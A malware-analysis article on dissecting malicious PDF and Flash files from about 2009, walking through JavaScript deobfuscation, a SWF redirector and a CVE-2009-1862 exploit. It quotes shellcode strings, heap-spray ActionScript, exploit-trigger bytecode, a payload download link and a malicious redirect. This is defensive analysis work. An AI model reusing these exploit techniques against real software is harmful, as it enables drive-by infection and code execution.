Browser attack. Analysis of malicious Flash objects and PDF documents.

Alisa Esage
@alisaesage

Introduction

Today most malware infections of end users happen through Web technologies. Over the last year the number of such attacks more than tripled [1]. The reason is the wealth of attack opportunities: a huge pool of potential “victims” on the Web, and a wide variety of applications and libraries used to display Web content of different types, from classic HTML and JavaScript to dynamic and office formats such as Flash, PDF and PPT (PowerPoint).

The article is also available in Russian

Malicious Adobe Flash movies and PDF documents are currently the most dangerous of all Web infection technologies. More specifically, malicious PDF documents accounted for 80% of all exploits discovered by the end of 2009 [2]. As shown below, the effectiveness of Trojan PDF documents rests on vulnerabilities in both Adobe Acrobat/Reader and Adobe Flash.

For now we discuss only vulnerabilities in Adobe software, because they dominate the statistical reports of security companies. In fact the problem is broader: first, it is a problem of vulnerabilities in popular data formats; second, it is a problem of transparent integration of Web pages with different content types.

Let’s state the reasons why mass infection through vulnerabilities in the handlers of various data formats is currently the most dangerous attack vector and the one with the highest growth potential.

1. Broad attack vector.

Vulnerabilities in the technologies that process popular data formats and are integrated with Web technologies are mostly cross-platform, cross-browser and cross-format.

Cross-platform reach naturally follows from the drive of monopolist vendors (such as Adobe with the PDF format) to capture the maximum market share. An application is compiled for different operating systems but is built from the same source code, with the same errors. Vulnerability CVE-2009-1862 is an example: four operating systems are affected by it. A malicious document exploiting this vulnerability is analyzed in Example 3.

Cross-browser reach comes from the fact that a file format external to the browser is processed by an independent application. The file is either passed to an external handler through a plug-in and displayed in the browser window, or opened in the corresponding application through OS calls. Therefore, if a file exploits a vulnerability in the handler itself, it works regardless of the browser's vendor, version and installed updates.

Cross-format reach comes from the mutual integration of the technologies: a Flash movie can be embedded into a PDF document, JavaScript code can live inside PDF and Flash, and all three (Flash, PDF and JavaScript) can be invoked from Web page code. Therefore a single vulnerability can be exploited with files of different types.

2. Integration of classic Web technologies with media content and office files keeps growing as the Web becomes a full-scale working environment. For the same reason browser developers try to make the handling of different file types more transparent (e.g. displaying a PDF in the browser window instead of saving it to the hard drive). This helps to automate mass infections.

3. The large volume of source code and the rapid development of libraries that process data formats make it easier to find new vulnerabilities. For example, a historical search in any vulnerability database shows that the supply of Adobe Flash vulnerabilities is inexhaustible.

4. The success of attacks through malicious office documents (such as PDF and PPT) still relies on a social factor: it is psychologically easier for a user to open an unknown office document than to launch a Flash movie or an executable file, which are widely known to require caution.

5. Most browsers are configured to play Flash movies and open PDF documents automatically. Therefore the vulnerability is exploited and the malicious code runs immediately after the user follows a malicious link and the content is downloaded, with no further user interaction.

The goal of this article is to give a systematic description of how such attacks work, and a logical and instrumental basis for analyzing them.

Analysis of malicious files

Example 1. PDF + JavaScript

Let’s analyze the most widespread malicious PDF document of the moment (MD5: c251dcf3190701c46ee6a3f562df32e6). This file was first discovered in December 2009 and almost immediately entered the Top 20 of malware on the Web [3] (Pdfka.asd, 12th place). In January it climbed two positions [4] (Pidief.cvl, 10th place), remaining the only PDF exploit with statistically significant prevalence. (Note: copies of the malicious files for this and the following examples, together with the files produced during analysis and processing, can be found in the attached archive.)

The file size is about 10 KB. If you open it in a text editor, you will see the typical PDF signature in the file header: %PDF.

PDF structure

The structure of a PDF file is simple and can be read with the naked eye. Background for the analysis of simple PDF exploits can be found in the article by D. Stevens, “Anatomy of Malicious PDF Documents” (in English) [5]. The PDF format is fully described in the ISO 32000-1 standard and in the corresponding reference manual. These documents can be downloaded from the Adobe website [6].

Let’s analyze the structure of this malicious file.

You can use the pdf-parser utility to get a dump of the PDF structure that is convenient for analysis. Here there is no need for it, since the file is small and its whole structure is clearly visible. We can see a set of standard objects: catalog (1), content (2), list of pages (3), descriptor of a single page (4), comments (annotations) catalog (5), embedded JavaScript (6) and two stream objects (7 and 8). Most of this data is compressed with the deflate algorithm (/FlateDecode).
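To make the /FlateDecode step less abstract, here is a minimal Node.js sketch of what a tool such as pdf-parser does when it unpacks a stream. It is not the utility's actual code. The function name inflatePdfStream and the sample object are made up for illustration, and the sketch assumes a single /FlateDecode filter, a direct integer /Length, no predictor and no encryption.

```javascript
const zlib = require('zlib');

// Inflate the stream of one raw PDF object.
// Assumptions: a single /FlateDecode filter, a direct integer /Length,
// no predictor and no encryption.
function inflatePdfStream(objectBytes) {
  const keyword = objectBytes.indexOf('stream');
  if (keyword < 0) throw new Error('no stream keyword found');

  // The dictionary precedes the keyword; read the direct /Length from it.
  const dict = objectBytes.toString('latin1', 0, keyword);
  const match = /\/Length\s+(\d+)\s*(?:\/|>>)/.exec(dict);
  if (!match) throw new Error('direct /Length not found');
  const length = parseInt(match[1], 10);

  // Stream data starts after the end-of-line that follows the keyword.
  let start = keyword + 'stream'.length;
  if (objectBytes[start] === 0x0d) start++; // CR
  if (objectBytes[start] === 0x0a) start++; // LF

  return zlib.inflateSync(objectBytes.subarray(start, start + length));
}

// Synthetic object for demonstration; the script text is made up.
const packed = zlib.deflateSync(Buffer.from('var x = 1;'));
const demoObject = Buffer.concat([
  Buffer.from(`7 0 obj\n<</Length ${packed.length}/Filter/FlateDecode>>\nstream\n`, 'latin1'),
  packed,
  Buffer.from('\nendstream\nendobj\n', 'latin1'),
]);
console.log(inflatePdfStream(demoObject).toString('latin1')); // → var x = 1;
```

For real samples the dedicated utility remains the better choice, since it also handles indirect lengths, filter chains and malformed objects.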

When analyzing a potentially malicious PDF file, pay attention to active content first. Here the embedded JavaScript (6) stands out. Its data is stored in the compressed object (7). The compressed script occupies only 160 bytes and is easy to overlook when inspecting the PDF structure.

From PDF to a script

Unpack the compressed object using the pdf-parser utility:

>pdf-parser.py -o 7 -f 0-sample > 3-javascript-obj 

The result is a very small script that reads the comments data (annotations, function getAnnots) and, after some processing, executes it as a script (function eval).

Why getAnnots? Some of the top Google results for this function name point to the CVE-2009-1492 vulnerability, which is related to an error in comments processing in Adobe Acrobat. But as the corresponding exploit [7] shows, that vulnerability has nothing in common with our case. Here the comments field is used merely as storage for the bulk of the script, to avoid suspicion at first glance.

The comments data returned by getAnnots is stored compressed in the stream object (8), which is referenced by the Annot object (5).

Unpack it as above and you will see a long string like z0dz0az0dz0az09:. To convert this string into a readable script, repeat what the small script does.

In the string taken from the annotation storage, every ‘z’ character is replaced with ‘%’. The ‘%’ character introduces a byte written in hexadecimal. The unescape function then converts the hexadecimal sequence into binary data (a sequence of ASCII characters in our case). The decoding can be done with the Decode Unescape online script or with any HEX-to-ASCII conversion tool.
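The same conversion can be reproduced offline. The sketch below is an illustration in Node.js rather than the sample's own code. The function name decodeAnnotation is hypothetical, and the sample string is made up apart from its leading z0dz0a...z09 bytes.

```javascript
// Decode a string in which 'z' stands in for '%' in front of each hex byte.
// Like the transformation described above, it replaces every 'z' blindly.
function decodeAnnotation(encoded) {
  return unescape(encoded.replace(/z/g, '%'));
}

// "z0dz0a" is CR LF and "z09" is a tab; the rest is a made-up example.
const sample = 'z0dz0az09z76z61z72z20z78z3b';
console.log(JSON.stringify(decodeAnnotation(sample))); // → "\r\n\tvar x;"
```

The decoded text is only printed, never evaluated, which is the safe way to handle untrusted script fragments.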

Decoding the string yields a fairly large and intentionally complicated (obfuscated) script (see attached file 7-script2).

Obfuscated JavaScript

How can we analyze intentionally complicated scripts? The first thing that makes a script look horrifying is the pseudorandom names of functions and variables (like v_8yD7D8CG__C). You can replace these identifiers with something short to make the script more readable.
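Renaming can be automated with a few lines of code. The following is a rough sketch, not a real deobfuscator. The function name renameIdentifiers, the second identifier in the sample and the regular expression for obfuscated names are assumptions chosen for this illustration and have to be adapted to each script.

```javascript
// Replace every identifier matching `pattern` with a short sequential name.
// `pattern` must be a global regex describing the obfuscated names.
// Caveat: matches inside string literals are renamed as well.
function renameIdentifiers(source, pattern, prefix = 'v') {
  const names = new Map();
  return source.replace(pattern, (id) => {
    if (!names.has(id)) names.set(id, prefix + (names.size + 1));
    return names.get(id);
  });
}

const obfuscated = 'var v_8yD7D8CG__C = 1; var k_Q9x_2 = v_8yD7D8CG__C + 1;';
// Hypothetical pattern: one letter, an underscore, then a run of word characters.
console.log(renameIdentifiers(obfuscated, /\b[A-Za-z]_\w+\b/g));
// → var v1 = 1; var v2 = v1 + 1;
```

Because the same name always maps to the same replacement, the renamed script keeps its behavior as long as the pattern does not also match legitimate names or string contents.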

Next, the functional core of the script should be located: the function or sequence of functions that does the main job. In this case we find the core by scanning the script for function names and JavaScript keywords (unlike variable identifiers, these cannot be obfuscated). The core is the eval function, which executes the next, encrypted part of the script.

There is no need to analyze the decryption procedure: we can make the script decrypt itself instead. Run the script in a suitable environment (e.g. a browser with JavaScript support) with the eval function replaced by document.write. The decrypted script is then printed in the browser window instead of being executed.

In this case the trick does not work because of anti-debugging protection (see the file 8-script2-fail!.html). First, the script uses its own code (arguments.callee [8]) in the decryption algorithm, so the algorithm produces wrong output after eval is changed to document.write.

Second, the app variable is checked. This variable is defined in the JavaScript environment of the application (Adobe Acrobat in this case) and is not defined in a browser or any other JavaScript interpreter.

Taking these details into account, the self-decryption procedure can be summarized as follows.

  1. The original script code, wrapped in the unescape function, should be substituted for the arguments.callee variable.
  2. The check of the app variable should be bypassed in any convenient way (e.g. by adding a var app = true statement to the script).
  3. All calls to eval() should be replaced with document.write().
  4. Angle brackets should be escaped in the argument of document.write(). Otherwise the browser’s HTML interpreter will consume them together with part of the output.
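function debrack(s) {
    // Escape '&' first so that the entities added below are not escaped again.
    s = s.replace(/&/g, "&amp;");
    s = s.replace(/>/g, "&gt;");
    s = s.replace(/</g, "&lt;");
    return s;
}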

From the script to a binary code

Running the modified script (see file 9-script2-ok.html) in the browser yields a new portion of code (see file a-script3), obfuscated in the same manner as the previous one. It is the last and central part of the script, since it contains no calls to eval.

A quick look at the script reveals its functional core:

1. Multiple calls to the unescape function with long arguments like: "%u9090%u9090%u9090%u21eb%ub859:..".

The argument strings of unescape can be recognized as shellcode: most of the encoded bytes fall outside the printable range [21h..7Eh], and the first string starts with several 90h bytes, the opcode of the x86 NOP instruction.

2. this.collabStore = Collab.collectEmailInfo({subj: "", msg: D_3_0824mk});

This function is unusual for JavaScript and immediately attracts attention. An Internet search for it leads to vulnerability CVE-2007-5659 [9] (and to advertisements for commercial exploit packs).
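The unescape arguments from item 1 can be turned into raw bytes for closer inspection. The sketch below is an illustration with hypothetical helper names (percentUToBytes, nonPrintableRatio). It assumes that each %uXXXX unit ends up in memory as a little-endian 16-bit value, as is the case on x86, and it ignores any %XX or plain characters mixed into the string.

```javascript
// Convert a "%uXXXX%uXXXX..." string into the bytes it places in memory.
// Each %uXXXX is one 16-bit unit, stored low byte first on x86.
function percentUToBytes(encoded) {
  const bytes = [];
  const re = /%u([0-9a-fA-F]{4})/g;
  let m;
  while ((m = re.exec(encoded)) !== null) {
    const unit = parseInt(m[1], 16);
    bytes.push(unit & 0xff, unit >> 8);
  }
  return Buffer.from(bytes);
}

// Fraction of bytes outside the printable range 21h..7Eh.
function nonPrintableRatio(buf) {
  let count = 0;
  for (const b of buf) if (b < 0x21 || b > 0x7e) count++;
  return buf.length ? count / buf.length : 0;
}

const head = percentUToBytes('%u9090%u9090%u9090%u21eb%ub859');
console.log(head.toString('hex'));    // → 909090909090eb2159b8
console.log(nonPrintableRatio(head)); // → 0.8
```

The resulting buffer can be written to a file and loaded into a disassembler. A high share of non-printable bytes together with a leading run of 90h is the pattern described in item 1.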

Analysis of the shellcode and of the vulnerability itself is beyond the scope of this article. We only note that the payload binary code (d-shellcode.exe-payload) includes a link to the malicious module that is downloaded and executed as a result of successful exploitation. This link can be seen with the naked eye.

thpt/:a/gfitbhtaewc.mon/etT/ERTS.3ype/2H85b9b9Vd10000f0700R6575c0ff101T2dbf77dd902l140903K431102 

You can continue the investigation by searching for parts of the link in the malc0de.net database of malicious links, in the logs of public sandboxes, etc.

Example 2. SWF

Unlike PDF documents, with their easily readable structure, Adobe Flash movies are harder to analyze. Therefore we start with a simple example of a malicious Flash object: Trojan-Downloader.SWF.Small.fj (MD5: f8e4e4206586f566c5dddc74884e57df).

The file is 232 bytes long. It starts with the CWS signature, which denotes the compressed Flash format [10]. You can use the cws2fws utility to decompress it. The uncompressed Flash format, ready for analysis, has the FWS signature.
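The CWS-to-FWS conversion is simple enough to sketch by hand. The code below is an illustration in Node.js, not the source of cws2fws, and the function name cwsToFws is made up. It relies on the SWF header layout: a 3-byte signature, a 1-byte version, a 4-byte little-endian length of the uncompressed file, and zlib-compressed data after those 8 bytes.

```javascript
const zlib = require('zlib');

// Turn a zlib-compressed SWF (signature "CWS") into an uncompressed one ("FWS").
// Only the signature changes in the 8-byte header; the rest is inflated.
function cwsToFws(swf) {
  const signature = swf.toString('latin1', 0, 3);
  if (signature === 'FWS') return swf; // already uncompressed
  if (signature !== 'CWS') throw new Error('not a zlib-compressed SWF');
  const body = zlib.inflateSync(swf.subarray(8));
  const header = Buffer.from(swf.subarray(0, 8)); // copy, keep the input intact
  header.write('FWS', 0, 'latin1');
  return Buffer.concat([header, body]);
}
```

A typical call would read the sample with fs.readFileSync, pass it to cwsToFws and write the result with fs.writeFileSync. Comparing the output length with the length field at offset 4 is a quick sanity check.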

Flash is a binary format. Along with meta information and static media content it contains a compiled program written in the ActionScript scripting language, which provides all Flash dynamics and interactivity, from managing visual forms to opening Web pages. You can use the SWFTools utility pack to analyze the file structure.

From the standpoint of potentially malicious content, the ActionScript program is the most interesting part of a Flash object. You can use the SWFScan utility to decompile ActionScript, and the swfdump utility from the SWFTools pack to get a dump of bytecode mnemonics.

The decompiled ActionScript of this file shows that the Flash object passes a small script to the browser's address bar (this.getURL). Decoding that script yields the string: window.location = "//pizdachesabuserov.xorg.pl/go/'+document.location.search+'";

So this Flash movie redirects the browser to another domain and passes along the query part of the current URL (the part after the ? symbol). It is one element of a scenario for mass infection of Web users by means of SEO poisoning [11].

Example 3. PDF + SWF

Now we know the principles of analyzing both PDF and SWF files. Let’s take a more complicated case: Exploit.SWF.Agent.br (MD5: 09a0f7aae0e22b5d80c7950890f3f738). It is a relatively old exploit, discovered in July 2009, but it made a lot of noise because of the interesting structure of the malicious file [12].

It is a PDF document of about 1 MB. A quick look at the file shows many PDF objects mixed with large blocks of binary data, so it is reasonable to use the pdf-parser utility to analyze the file structure.

PDF structure

Analysis of the file structure (pdf-parser.py 0-sample > 1-pdfparse) doesn’t show anything extraordinary. There are no scripts, only several ObjStm and XObject objects of unclear purpose.

Let’s analyze the PDF more thoroughly and include the unpacked binary data in the structure dump (pdf-parser.py -f 0-sample > 2-streamfilter). Our goal is to check whether the packed data hides anything suspicious.

A quick look at the largest blocks of unpacked data reveals several images (/Subtype /Image, objects 29, 31 and 5), a metadata block (/Type /Metadata, object 6) and two suspicious blocks of embedded PDF markup (objects 33 and 7). A closer look at one of the blocks (33) reveals references to two attached SWF files:

<>/F(fancyBall.swf)/Type/Filespec/UF(fancyBall.swf)>>
<>/F(oneoff.swf)/Type/Filespec/UF(oneoff.swf)>>

The ability to embed Flash objects into PDF documents appeared in Adobe Reader version 9 and is described in the Supplement to ISO 32000 [13].

The second PDF object (7) includes a reference to an embedded image:

<>/F(love_wallpaper_butterfly-dsc08951.jpg)

We save the corresponding objects (2,3 and 4) for further analysis (pdf-parser.py -o 2 -d 0-sample > 3- fancyball.swf etc.).

Analysis of embedded PDF objects

Decompiling fancyball.swf yields an innocent script copied from the examples for the Flash Professional 9 ActionScript 3.0 Preview [14] (file 3.1-actionscript-decompile):

public function Ball()
{
    trace("ball created: " + this.name);
    this.buttonMode = true;
    this.addEventListener(MouseEvent.CLICK, this.clickHandler);
    this.addEventListener(MouseEvent.MOUSE_DOWN, this.mouseDownListener);
    this.addEventListener(MouseEvent.MOUSE_UP, this.mouseUpListener);
    return;
}

But the bytecode dump of the same script (swfdump -D 3.0-fancyball.swf > 3.2-actionscript-dump) shows that the initialization function of the script has been replaced with a short piece of code of unclear purpose:

initmethod * init=()(0 params, 0 optional)
[stack:2 locals:1 scope:1-9 flags:]
{
    00000) + 0:0 pushshort 2049 
    00001) + 1:0 pushshort 12536
    00002) + 2:0 multiply
    00003) + 1:0 pushscope
    00004) + 0:1 getlex <q>[public]::void
    00005) + 1:1 nop
    00006) + 1:1 nop
:
    00033) + 1:1 returnvoid
}

The only purpose of the code above is to multiply two numbers on the stack (the product is an address within the heap) and to call an undeclared object (see the instruction set of the ActionScript virtual machine [15]). When these instructions are interpreted, control is transferred into the heap (CVE-2009-1862).
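For reference, the product of the two pushshort operands can be checked with a couple of lines. This is plain arithmetic on the values from the dump and makes no claim about how the player uses the result internally.

```javascript
// Operands of the two pushshort instructions in the bytecode dump.
const product = 2049 * 12536;
const productHex = '0x' + product.toString(16).padStart(8, '0');
console.log(product, productHex); // → 25686264 0x0187f0f8
```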

And what do we have in the heap?

Let’s analyze the decompiled script of the second Flash object, oneoff.swf (file 4.1-actionscript-decompile).

1. Assignment of two local variables.

internal function frame1()
{
    this.b = "";
    this.a = "";

As the bytecode dump shows, they hold two numbers: 0x0c0c0c0c and 0x13131313.

00002) + 0:1 findproperty <q>[public]::b
00003) + 1:1 pushstring "\0c\0c\0c\0c"
00004) + 2:1 initproperty <q>[public]::b
00005) + 0:1 findproperty <q>[public]::a
00006) + 1:1 pushstring "\13\13\13\13"
00007) + 2:1 initproperty <q>[public]::a

2. Creation of a 1 MB sequence of 0x13 bytes (1048576 = 1024^2).

while(this.b.length < -1048576)
{
    this.b = this.b + this.a;
}

3. Dynamic creation of an array in the heap.

this.byteArr = new ByteArray();

4. Filling this array with the generated sequence 64 times.

this.byteArr = new ByteArray();
while(this.byteArr.length < -1048576 * 64)
{
     byteArr.writeMultiByte(this.b, "iso-8859-1");
}

5. Dynamic generation of shellcode at the end of this array.

... 
byteArr.writeByte(144);
byteArr.writeByte(144);
byteArr.writeByte(129);
byteArr.writeByte(236);
byteArr.writeByte(32);
byteArr.writeByte(1);
...

Thus, running the program of this Flash object fills the dynamic memory of the process with a 64 MB array of neutral instructions (the byte pair 0x13 0x13 decodes to the instruction adc edx,[ebx]), with shellcode at the very end. This is the heap spray technique. It ensures reliable execution of the shellcode, which takes control after the vulnerability is exploited, without the need to place it at a specific address in process memory.

The shellcode (we will not analyze its details here) decrypts and launches the malicious modules hidden in the image file love_wallpaper_butterfly-dsc08951.jpg. These modules can be located and decrypted manually: pay attention to long runs of a single byte value (0xA0, 0x37) in the file and assume that they are the result of stream XOR encryption of the zero runs typical for the header of an executable module (see files 7-malware1.ex, 9.0-malware2).
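The manual approach just described can be sketched in code. The example below assumes the simplest case, a single-byte XOR key per module, which is an assumption for illustration and not a statement about the sample's actual cipher. The helper names guessXorKey and xorDecode and the test data are made up.

```javascript
// Guess a single-byte XOR key: the byte value forming the longest run.
// Rationale: runs of 0x00 in an executable header encrypt to runs of the key.
function guessXorKey(data) {
  let bestByte = 0, bestRun = 0, run = 0;
  for (let i = 0; i < data.length; i++) {
    run = (i > 0 && data[i] === data[i - 1]) ? run + 1 : 1;
    if (run > bestRun) { bestRun = run; bestByte = data[i]; }
  }
  return { key: bestByte, runLength: bestRun };
}

// XOR every byte with the key; the same call encrypts and decrypts.
function xorDecode(data, key) {
  const out = Buffer.alloc(data.length);
  for (let i = 0; i < data.length; i++) out[i] = data[i] ^ key;
  return out;
}

// Made-up plaintext resembling the start of an executable header.
const plain = Buffer.concat([Buffer.from('MZ'), Buffer.alloc(32), Buffer.from('This program')]);
const encrypted = xorDecode(plain, 0xa0);
const guess = guessXorKey(encrypted);
console.log(guess.key.toString(16), guess.runLength);                  // → a0 32
console.log(xorDecode(encrypted, guess.key).toString('latin1', 0, 2)); // → MZ
```

On a real file the longest run may belong to image data rather than to an encrypted module, so it is worth applying the search to the suspicious region only and checking the decoded bytes for an executable header.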

Along with the executable modules, this “image” contains one more embedded PDF file (8.0-emdedded.pdf).

Conclusion

In conclusion, we would like to highlight several important points from the analysis of the examples.

1. Both vulnerabilities exploited by the analyzed malicious files are cross-platform.

2. The vulnerability from the last example (CVE-2009-1862) is also cross-format: Adobe Flash objects can run as separate modules or be embedded into a Web page or a PDF document.

3. Therefore the exploit from the last example has great attack potential: several attack vectors (Flash on Web pages, PDF documents) on four operating systems (Windows, Macintosh, Linux and Solaris [16]). The same is true, to a greater or lesser extent, of any Flash vulnerability.

4. Two months passed between the approximate date of the vulnerability's discovery (1 June 2009, the date it was entered into the CVE database) and the release of a patch by Adobe (30 July 2009, the date of the corresponding bulletin [17]).

Addendum to the article: nb2-flash-attachment.rar (the password is sent on request).

Links

1. Kaspersky Lab. Kaspersky Security Bulletin 2009. Main statistics for 2009.
2. ScanSafe. Annual Global Threat Report 2009.
3. Kaspersky Lab. Malicious software rating, December 2009.
4. Kaspersky Lab. Malicious software rating, January 2010.
5. D. Stevens. Anatomy of Malicious PDF Documents.
6. Adobe. Portable Document Format - Part 1: PDF 1.7, First Edition.
7. Milw0rm. Exploit for CVE-2009-1492.
8. Bojan Zdrnja. Browser *does* matter, not only for vulnerabilities - a story on JavaScript deobfuscation.
9. SecurityFocus. Exploit for CVE-2007-5659.
10. Adobe. SWF File Format Specification Version 10.
11. Tiger Woods SEO poisoning attack.
12. Kaspersky Lab. SWF or PDF? Either way, it's Adobe!
13. Adobe. Acrobat Supplement to the ISO 32000.
14. Jen deHaan. Exploring the Flash Professional 9 ActionScript 3.0 Preview.
15. Adobe. ActionScript Virtual Machine 2 Overview.
16. Adobe. Security advisory for Adobe Reader, Acrobat and Flash Player.
17. Adobe. Security updates available for Adobe Flash Player, Adobe Reader and Acrobat.


Last updated: 17.03.2012